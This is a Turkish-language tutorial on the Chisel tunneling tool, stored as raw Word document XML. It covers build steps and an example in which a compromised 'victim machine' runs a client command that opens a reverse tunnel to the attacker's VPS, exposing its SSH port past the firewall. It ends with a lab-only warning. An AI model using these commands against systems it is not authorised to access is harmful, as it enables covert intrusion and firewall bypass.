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BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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BA6BD6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Chisel</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6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BA6BD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1. Nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA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6BD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Chisel</w:t>
      </w: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bir tür </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6BD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ağ tünelleme</w:t>
      </w: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(network tunneling) aracıdır.</w:t>
      </w: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İki bilgisayar arasında gizli bir bağlantı kurar ve bu bağlantı üzerinden veri taşır.</w:t>
      </w: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Kısaca: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6BD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İç ağdan dış ağa gizli yol açmak</w:t>
      </w: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 kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA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Genellikle bir sistemde "arkakapı" açmak ya da güvenlik duvarını </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6BD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aşmak (bypass etmek)</w:t>
      </w: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amacıyla kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA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5760720" cy="2245544"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1" name="Resim 1" descr="Chisel — Tool For Your Lateral Movement | by Jie Liau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isel — Tool For Your Lateral Movement | by Jie Liau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4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BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6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A6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6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BA6BD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2. Ne işe yarar?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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>Bir sistemde oturum açtığını düşün (örneğin bir şirket içindeki bilgisayar).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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>Bu bilgisayardan internete doğrudan çıkış izni yok ama sen dış dünyaya bağlantı kurmak istiyorsun.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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6BD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Chisel ile gizli bir tünel açabilir</w:t>
      </w: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dışarıdaki sunucuna bağlanabilirsin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA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6BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w: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Aynı zamanda, içerdeki başka portlara ya da hizmetlere ulaşmak için de kullanılır.</w:t>
      </w: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Bu işleme </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6BD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port yönlendirme (port forwarding)</w:t>
      </w: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veya </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6BD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reverse tunneling</w:t>
      </w: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denir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6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A6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6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BA6BD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3. Neden Önemlidir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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Birçok ağ, dış dünyayla iletişimi sınırlandırmak için </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6BD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güvenlik duvarı (firewall)</w:t>
      </w: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kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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>Chisel, bu duvarların arkasından çıkmak için kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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yüzden hem </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6BD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saldırganlar</w:t>
      </w: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hem de </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6BD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Red Team</w:t>
      </w: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 aracı sever.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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6BD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Blue Team</w:t>
      </w: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 de önemlidir çünkü bu tür gizli bağlantılar fark edilmezse büyük tehlike oluşturur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6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A6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6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BA6BD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4. Nasıl Kurulur? (Linux örneği)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA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>Chisel, tek bir dosya ile çalışır. Go dilinde yazılmıştır. Yani kurulumu çok basit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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>GitHub üzerinden indir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA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627307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git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00627307" w:rsidRPr="00BC5F23">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:b/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>https://github.com/jpillora/chisel.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00627307" w:rsidRDefault="00627307" w:rsidP="00BA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627307" w:rsidRDefault="00627307" w:rsidP="00BA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627307">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BA29D2D" wp14:editId="4DD178F0">
            <wp:extent cx="5273497" cy="457240"/>
            <wp:effectExtent l="0" t="0" r="381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307" w:rsidRPr="00627307" w:rsidRDefault="00627307" w:rsidP="00BA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BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA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627307">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>cd chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00627307" w:rsidRDefault="00627307" w:rsidP="00BA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627307" w:rsidRPr="00627307" w:rsidRDefault="00627307" w:rsidP="00BA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627307">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D5C19D7" wp14:editId="3FA07DB1">
            <wp:extent cx="3589331" cy="1044030"/>
            <wp:effectExtent l="0" t="0" r="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D6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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>Build et (go dili ile):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA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627307">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>go build</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00627307" w:rsidRDefault="00627307" w:rsidP="00BA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627307" w:rsidRPr="00627307" w:rsidRDefault="00627307" w:rsidP="00BA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627307">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ED8F259" wp14:editId="29C18650">
            <wp:extent cx="2972058" cy="434378"/>
            <wp:effectExtent l="0" t="0" r="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D6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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Hepsi bu! Artık </w:t>
      </w:r>
      <w:r w:rsidRPr="00627307">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>./chisel</w:t>
      </w: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komutunu kullanarak çalıştırabilirsin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00627307" w:rsidP="00BA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Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA6BD6"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Alternatif olarak GitHub Releases sayfasından doğrudan </w:t>
      </w:r>
      <w:r w:rsidR="00BA6BD6" w:rsidRPr="00627307">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r w:rsidR="00BA6BD6"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 da </w:t>
      </w:r>
      <w:r w:rsidR="00BA6BD6" w:rsidRPr="00627307">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>.linux</w:t>
      </w:r>
      <w:r w:rsidR="00BA6BD6"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dosyasını indirip çalıştırabilirsin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6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A6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6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BA6BD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5. Örnek Bir Anlatım:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA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Sen bir şirketteki hedef bilgisayara sızdın ve kendi VPS sunucuna bağlanmak istiyorsun. Ama güvenlik duvarı dışarı çıkmanı engelliyor. O zaman:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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6BD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Sunucu tarafında (dinleyici) çalıştır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00627307" w:rsidRDefault="00BA6BD6" w:rsidP="00BA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627307">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>./chisel server -p 8080 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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6BD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Hedefte (kurban makine) client olarak çalıştır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA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A6BD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00627307">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>/chisel client senin_ip_adresin:8080 R:8888:127.0.0.1:22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA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>Bu ne yaptı?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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>Hedef makineden senin VPS'ine bir bağlantı kurdu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6B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Artık kendi bilgisayarından </w:t>
      </w:r>
      <w:r w:rsidRPr="00627307">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>localhost:8888</w:t>
      </w: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üzerinden hedefin SSH portuna (22) bağlanabilirsin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA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Kısaca: Güvenlik duvarı arkasındaki sistemlere </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6BD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gizli kapı açmış oldun.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6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A6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6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BA6BD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Uyarı:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA6BD6" w:rsidRPr="00BA6BD6" w:rsidRDefault="00BA6BD6" w:rsidP="00BA6BD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Chisel gibi araçlar güçlüdür ve kötüye kullanılırsa çok tehlikeli olabilir. Yalnızca </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6BD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laboratuvar ortamında ve yasal izinlerle</w:t>
      </w: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kullanılmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2151" w:rsidRDefault="00CE2151"/>
    <w:sectPr w:rsidR="00CE2151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B11" w:rsidRDefault="00336B11" w:rsidP="00E831FD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00336B11" w:rsidRDefault="00336B11" w:rsidP="00E83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B11" w:rsidRDefault="00336B11" w:rsidP="00E831FD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00336B11" w:rsidRDefault="00336B11" w:rsidP="00E83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1FD" w:rsidRDefault="00E831FD" w:rsidP="00E831FD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A1C3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C39E0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F50082"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5512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97E04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40DA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293FE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05CA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A517BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8410F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76F"/>
    <w:rsid w:val="00336B11"/>
    <w:rsid w:val="005B5797"/>
    <w:rsid w:val="00627307"/>
    <w:rsid w:val="0070576F"/>
    <w:rsid w:val="00BA6BD6"/>
    <w:rsid w:val="00CE2151"/>
    <w:rsid w:val="00E8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AACF987-B26A-48E5-AD94-245C0FB0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BA6B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BA6B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A6BD6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BA6BD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BA6B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A6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A6BD6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BA6BD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VarsaylanParagrafYazTipi"/>
    <w:rsid w:val="00BA6BD6"/>
  </w:style>
  <w:style w:type="character" w:styleId="Kpr">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00627307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E831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831FD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AltBilgi">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="AltBilgiChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E831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83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9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2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0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6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2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1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1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0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3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91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jpillora/chisel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BERDAN MUT</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mikail Güven Çiçek</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-23T12:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-23T13:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>